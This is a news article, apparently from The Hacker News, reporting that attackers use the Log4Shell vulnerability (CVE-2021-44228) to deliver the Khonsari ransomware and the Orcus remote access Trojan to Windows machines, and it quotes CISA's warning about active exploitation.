Select Page

Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability.

The attack leverages the remote code execution (RCE) flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension “.khonsari” and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files.

Tracked as CVE-2021-44228, the RCE vulnerability is also known by the monikers “Log4Shell” or “Logjam” and impacts versions 2.0-beta9 to 2.14.1 of the software library. In simple terms, the bug could force an affected system to download malicious software, giving the attackers a digital beachhead on servers located within corporate networks.

Log4j is an open-source Java library maintained by the nonprofit Apache Software Foundation. Amassing about 475,000 downloads from its GitHub project and adopted widely for application event logging, the utility is also a part of other frameworks, such as Elasticsearch, Kafka and Flink, that are used in many popular websites and services.

The disclosure comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) sounded an alarm warning of active, widespread exploitation of the flaw that, if left unaddressed, could grant unfettered access and unleash a new round of cyber attacks, as fallout from the bug has left companies rushing to find and patch vulnerable machines.

“An adversary can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code,” the agency said in guidance issued Monday. “The request allows the adversary to take full control over the system. The adversary can then steal information, launch ransomware, or conduct other malicious activity.”

images from Hacker News